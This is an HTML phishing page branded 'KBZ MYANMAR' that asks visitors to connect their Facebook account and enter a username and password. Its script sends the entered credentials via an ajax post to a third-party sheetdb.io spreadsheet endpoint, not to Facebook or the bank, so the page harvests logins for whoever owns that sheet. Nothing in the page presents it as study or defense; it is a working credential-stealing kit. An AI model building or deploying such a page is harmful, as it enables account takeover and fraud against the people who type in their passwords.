<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>

input[type=text], input[type=password] {
  width: 100%;
  padding: 12px 20px;
  margin: 0px 0;
 display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box; 
}


button {
  background-color: blue;
  color: White;
  padding: 14px 15px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
}



.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #f44336;
}

.imgcontainer {
  text-align: center;
  margin: 24px 0 12px 0;
}

img.avatar {
  width: 40%;
  border-radius: 10%;
}

.container {
  padding: 16px;
}
span.psw {
  float: right;
  padding-top: 16px;
  }

span.psw {
  float: right;
  padding-top: 16px;
  }


/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  .cancelbtn {
     width: 100%;
  }
}
.full-screen video{
  position: absolute;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  object-fit: cover;
  z-index: -1;
}
  .center {
  text-align: center;
  color: blue;
  }
</style>

<script
src="https://code.jquery.com/jquery-3.4.1.js"
integrity="sha256-WpOohJOqMqqyKL9FccASB9O0KwACQJpFTUBLTYOVvVU="
crossorigin="anonymous"></script>
<script>
function SubForm (){
$.ajax({
url:'https://sheetdb.io/api/v1/agluegtu2me07',
type:'post',
data:$("#myForm").serializeArray(),
success: function(){
alt("Form Data Submitted :)")
},
error: function(){
alert("There was an error :(")
}
});
}
</script>
</head>
<body>


<div class="full-screen">
    <video sr="https://videos.pexels.com/video-files/1757800/1757800-uhd_2560_1440_25fps.mp4" autoplay muted loop></video>
    <div class="content">
    	
<div class="imgcontainer">
    <img src="https://img.utdstc.com/icon/047/268/0472685d57cbf56a960b99b820859c7b0a8fd8e38e38f419959d59024b6e5d4a" alt="Avatar" class="avatar">
  </div>
      
 <h1 class="center">KBZ MYANMAR</h1>
<p class="center">Contect To Your Facebook Account</p>
      
  <div class="container">
  	
  	
 
                      
                    
    <label style="color:blue;"for="name"><b>Username</b></label>
   
   	  <form id="myForm">
 <input style="color:blue;"type="text" placeholder="Enter Username" name="name" required>
 

    <label style="color:blue;" for="pass"><b>Password</b></label>
 
	  <form id="myForm">
  <input style="color:blue;"type="password" placeholder="Enter Password" name="pass" required>
        
              </div>
                 </form>
    <button type="Submit"onclick="SubForm()">Login</button>
  
    <label>
      <input type="checkbox" checked="checked" name="remember"> Remember me
    </label>
  </div>
  <div class="container" style="background-color:#None">
    <button type="button" class="cancelbtn">Cancel</button>
    <span style="color:white;"class="psw">Forgot <a href="#">password?</a></span>
  </div>
</form>

</body>
</html>